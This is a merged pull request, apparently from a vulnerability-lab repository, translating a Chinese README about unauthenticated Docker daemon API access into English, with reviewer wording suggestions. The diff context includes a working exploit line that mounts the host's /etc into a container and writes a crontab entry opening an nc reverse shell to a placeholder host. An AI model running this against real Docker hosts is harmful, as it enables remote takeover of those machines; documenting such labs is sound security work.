### PR TITLE
translate docker/unauthorized-rce

### PR DESCRIPTION
**Pull request by yangxuan8282**

### CODE REVIEW

File: docker/unauthorized-rce/README.md [hunk 1]
```diff
@@ -1,23 +1,27 @@
-# docker daemon api 未授权访问漏洞
+# docker daemon api exploit
```
Comment (sfdye) [inline docker/unauthorized-rce/README.md]: unauthorized access

File: docker/unauthorized-rce/README.md [hunk 2]
```diff
@@ -1,23 +1,27 @@
...
-环境启动后，将监听2375端口。
+after the service started, the 2375 port was published to the host
+
+## Exploit
 
-## 漏洞复现
+Start a container, and mount the host `/etc` folder to the container, then we have read/write access to any files.
 
-利用方法是，我们随意启动一个容器，并将宿主机的`/etc`目录挂载到容器中，便可以任意读写文件了。我们可以将命令写入crontab配置文件，进行反弹shell。
+We can put the commands in crontab configure file to reverse shell
```
Comment (sfdye) [inline docker/unauthorized-rce/README.md]: We can inject the commands in crontab configurations to perform the reverse shell exploit

File: docker/unauthorized-rce/README.md [hunk 3]
```diff
@@ -26,6 +30,6 @@ client = docker.DockerClient(base_url='http://your-ip:2375/')
 data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
 ```
 
-写入crontab文件，成功反弹shell：
+reverse shell success：
```
Comment (sfdye) [inline docker/unauthorized-rce/README.md]: Reverse shell exploit by injecting commands in crontab

File: docker/unauthorized-rce/README.md [hunk 4]
```diff
@@ -1,23 +1,27 @@
...
 docker-compose up -d
 ```
 
-环境启动后，将监听2375端口。
+after the service started, the 2375 port was published to the host
+
+## Exploit
 
-## 漏洞复现
+Start a container, and mount the host `/etc` folder to the container, then we have read/write access to any files.
```
Comment (sfdye) [inline docker/unauthorized-rce/README.md]: Start a container, and mount the host's `/etc` folder to the container, then we will have read/write access to any file.

File: docker/unauthorized-rce/README.md [hunk 5]
```diff
@@ -1,23 +1,27 @@
...
-编译及启动漏洞环境：
+Enter following command to build and run the vulnerability environment:
 
 ```
 docker-compose build
 docker-compose up -d
 ```
 
-环境启动后，将监听2375端口。
+after the service started, the 2375 port was published to the host
```
Comment (sfdye) [inline docker/unauthorized-rce/README.md]: After the service is started, we will be listening on port 2375

File: docker/unauthorized-rce/README.md [hunk 6]
```diff
@@ -1,23 +1,27 @@
...
+
+Reference Links：
 
 - http://www.loner.fm/drops/#!/drops/1203.%E6%96%B0%E5%A7%BF%E5%8A%BF%E4%B9%8BDocker%20Remote%20API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%88%A9%E7%94%A8
 
-## 漏洞环境
+## Vulnerability environment
 
-编译及启动漏洞环境：
+Enter following command to build and run the vulnerability environment:
```
Comment (sfdye) [inline docker/unauthorized-rce/README.md]: Enter the following commands to build and run the vulnerability environment:

File: docker/unauthorized-rce/README.md (hunk 5 above)
Comment (yangxuan8282) [reply docker/unauthorized-rce/README.md]: 感觉说 we will be listening 不太合适吧

Comment (sfdye) [reply docker/unauthorized-rce/README.md]: 其实这句可以不要 不需要逐句翻译

**Comment by sfdye** [comment]
LGTM

**Pull request merged**